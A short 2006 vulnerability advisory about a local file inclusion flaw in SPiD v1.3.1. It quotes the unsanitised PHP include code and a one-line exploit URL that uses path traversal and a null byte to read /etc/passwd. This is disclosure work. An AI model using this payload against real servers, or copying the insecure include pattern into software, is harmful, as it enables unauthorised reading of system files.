Advisory: NSAG-№201-25.02.2006 Research: NSA Group [Russian company on Audit of safety & Network security] Site of Research: http://www.nsag.ru or http://www.nsag.org Product: SPiD v1.3.1 Site of manufacturer: http://spid.adnx.net/ The status: 19/01/2006 - Publication is postponed. 14/02/2006 - Answer of the manufacturer is absent. 25/02/2006 - Publication of vulnerability. Original Advisory: http://www.nsag.ru/vuln/955.html Risk: Hide Description: Attacker can form the query in URL form ang get the access to the system files. Vulnerability code: +++++++ if (isset($_REQUEST["lang"])) { $file_lang = $lang_path . "lang_" . $_REQUEST["lang"] . ".php" if (file_exists($file_lang)) { include $lang_path . "lang.php"; include $file_lang; ..... skip +++++++ Exploit: http://example.com/spiddir/scan_lang_insert.php?lang=../../../../../../../../etc/passwd%00 More information: http://www.nsag.ru/vuln/955.html ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ www.nsag.ru «Nemesis» © 2006 ------------------------------------ Nemesis Security Audit Group © 2006.
